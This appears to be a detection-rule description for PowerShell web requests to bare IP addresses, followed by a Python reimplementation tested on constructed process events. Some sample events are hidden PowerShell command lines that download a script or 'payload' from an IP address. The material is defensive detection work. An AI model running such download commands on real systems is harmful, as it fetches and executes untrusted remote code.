
Summary
This rule detects potentially suspicious PowerShell command executions in which the Invoke-WebRequest cmdlet (or a similar command such as curl or wget) reaches a resource by a literal IP address rather than a domain name. The rationale is that attackers often sidestep domain-based security measures by contacting compromised systems or command-and-control servers directly by numerical IP address. The rule matches events in which PowerShell or PowerShell Core (pwsh) is launched with command-line parameters that include Invoke-WebRequest, curl or wget together with a direct IP pattern in the command line. It is indexed under the process_creation log source for the Windows platform, relying on the details that process lifecycle telemetry provides to strengthen detection. False positives arise mainly from legitimate use of PowerShell to communicate with web services by direct IP address, so flagged events require analyst review. The rule carries a medium severity level: a noteworthy risk that merits attention even though it is less common than other attack vectors, and it fits within best practice for ongoing monitoring of PowerShell activity in the environment.
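As an added example that is not the rule's own definition (the page does not show its selection strings), the detection logic described above written in Python and run over constructed process-creation events; the image names, the iwr alias and the direct-IP URL pattern are assumptions, and the allowlist is a triage layer on top of the rule rather than part of it.

```python
import re
from dataclasses import dataclass

# Assumed approximation of the rule: PowerShell host image, a web-request
# cmdlet/alias in the command line, and a URL whose host is a bare IPv4.
POWERSHELL_IMAGES = ("\\powershell.exe", "\\pwsh.exe")
WEB_REQUEST = re.compile(r"\b(?:invoke-webrequest|iwr|curl|wget)\b", re.IGNORECASE)
DIRECT_IP_URL = re.compile(r"https?://((?:\d{1,3}\.){3}\d{1,3})(?::\d+)?", re.IGNORECASE)


@dataclass
class ProcessEvent:
    image: str          # full path of the created process
    command_line: str   # its command line as logged by process_creation telemetry


def matches_rule(event: ProcessEvent) -> bool:
    """True when the event satisfies all three conditions of the detection logic."""
    if not event.image.lower().endswith(POWERSHELL_IMAGES):
        return False
    if not WEB_REQUEST.search(event.command_line):
        return False
    return DIRECT_IP_URL.search(event.command_line) is not None


def triage(events, allowlist=frozenset()):
    """Rule matches minus known-good IPs documented by the analyst (false-positive tuning)."""
    hits = []
    for event in events:
        if matches_rule(event):
            ip = DIRECT_IP_URL.search(event.command_line).group(1)
            if ip not in allowlist:
                hits.append(event)
    return hits


# Constructed sample events using RFC 5737 documentation addresses, not real telemetry.
PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcessEvent(PS_IMAGE, 'powershell.exe -nop -w hidden -c "Invoke-WebRequest http://203.0.113.10/a.ps1 -OutFile a.ps1"'),
    ProcessEvent(r"C:\Program Files\PowerShell\7\pwsh.exe", 'pwsh -c "iwr https://198.51.100.7:8443/payload -UseBasicParsing"'),
    ProcessEvent(PS_IMAGE, 'powershell -c "Invoke-WebRequest https://updates.example.com/file.zip"'),  # domain name: no match
    ProcessEvent(r"C:\Windows\System32\curl.exe", "curl http://203.0.113.10/x"),  # not a PowerShell host: no match
    ProcessEvent(PS_IMAGE, 'powershell -c "Test-NetConnection 10.0.0.5 -Port 443"'),  # IP but no web-request command
    ProcessEvent(PS_IMAGE, 'powershell -c "iwr http://192.0.2.25/health"'),  # matches, but an internal endpoint on the allowlist
]

if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS, allowlist={"192.0.2.25"}):
        print("ALERT:", hit.command_line)
```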
Categories
- Endpoint
- Windows
Data Sources
- Process
Created: 2023-04-21